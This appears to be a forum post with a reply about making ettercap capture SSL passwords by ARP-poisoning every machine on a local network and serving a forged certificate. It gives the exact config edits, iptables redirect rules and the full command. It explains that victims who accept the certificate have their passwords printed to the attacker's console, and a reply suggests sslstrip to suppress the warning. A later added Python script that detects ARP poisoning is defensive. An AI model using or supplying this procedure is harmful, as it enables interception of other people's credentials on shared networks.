For people with Ettercap/SSL trouble.
I spent a lot of time trying to get ettercap to sniff SSL passwords using ARP poisoning and sending a forged certificate to the victim machine. I saw a lot of posts very similar to my problem on here without actually finding the solution, so I'm posting what I figured out last night.
For me the problem was very simple. ettercap doesn't seem to do port forwarding for the machine that it is running on. Yes, that's what I messed up. I ran ettercap with all the proper arguments and then FTP'd to some place, and saw the password. "Great!" I thought, and then I tried GMail and it was silent, it didn't show anything. This is a sign of SSL not being forwarded or that you did edit /etc/ettercap.conf properly (see below).
I didn't realize that to test this I should grab another machine. I thought the machine I was on was fine. A lot of searching and asking in IRC and this didn't come up so I figured it should be posted to here.
Here's exactly what I did for your benefit:
Step 1) Edit /etc/ettercap.conf
Step 1a) Set the following lines to zero instead of 65536
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Step 1b) Uncomment the following two lines later in the file
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Step 2) Run the following command:
ettercap --text --quiet --iface eth1 --plugin autoadd --log-info mylog --mitm arp:remote // //
Note: You only have to perform step 1 once on a machine, then run the command whenever.
Explanation of arguments:
--text: puts ettercap in text-only, no interactive UI mode
--quiet: suppresses output of all the packets being sniffed, limits output to only passwords
--iface eth1: This is the LAN interface you're using; eth1 happens to be my wireless card.
--plugin autoadd: Very useful plugin. This will poison machines that connect after you have started the script. If you don't do this, you only poison the machines that are on when you begin, which might be no one.
--log-info mylog: Logs just connection details and passwords. See manpage if you want more logging. This will create a file called log.eci which can be read later with etterlog.
--mitm arp:remote: Tells ettercap to poison the ARP tables so that everyone on the network thinks that you're the gateway and all communication will go through you.
// //: These are two lists of IP, port ranges to sniff. Read the man page on this for more details. As I have set it up, it will poison and sniff everyone on the network.
Details of what will happen:
After you run the command, anyone on the network visiting an SSL page (that is anything with https rather than http) is going to see a new certificate and get a very non-subtle warning that there's possibly foul play afoot (assuming they have visited the site before and have a valid certificate stored already). If they accept the new certificate and log in, their password will be printed to your console.
Hope this helps,
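
Added example, not part of the original post: a defender-side check for the ARP poisoning described above, which makes the gateway's IP resolve to another host's MAC in each client's neighbour table. It assumes Linux `ip neigh show` output; the addresses, the expected gateway MAC and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output taken on a client machine.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth1 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev eth1 lladdr 00:11:22:33:44:55 STALE
192.168.1.40 dev eth1 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.77 dev eth1  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>[0-9a-fA-F:]{17})\b")


def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m["ip"]] = m["mac"].lower()
    return table


def check_arp(table, gateway_ip, known_gateway_mac=None):
    """Return findings that suggest the gateway entry was poisoned."""
    findings = []
    gw_mac = table.get(gateway_ip)
    # Check 1: gateway MAC differs from the one recorded out of band.
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} maps to {gw_mac}, "
                        f"expected {known_gateway_mac.lower()}")
    # Check 2: another host shares the gateway's MAC. Routers that own
    # several addresses can trigger this too, so treat it as a lead.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and gateway_ip in ips:
            others = sorted(i for i in ips if i != gateway_ip)
            findings.append(f"{mac} answers for gateway {gateway_ip} "
                            f"and for {', '.join(others)}")
    return findings


if __name__ == "__main__":
    table = parse_neigh(SAMPLE_NEIGH)
    for finding in check_arp(table, "192.168.1.1", "de:ad:be:ef:00:01"):
        print("ALERT:", finding)
```

A static ARP entry for the gateway on clients, or dynamic ARP inspection on the switch, prevents the condition this script only detects.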
try sslstrip for the certificate warning
Good friend of the forums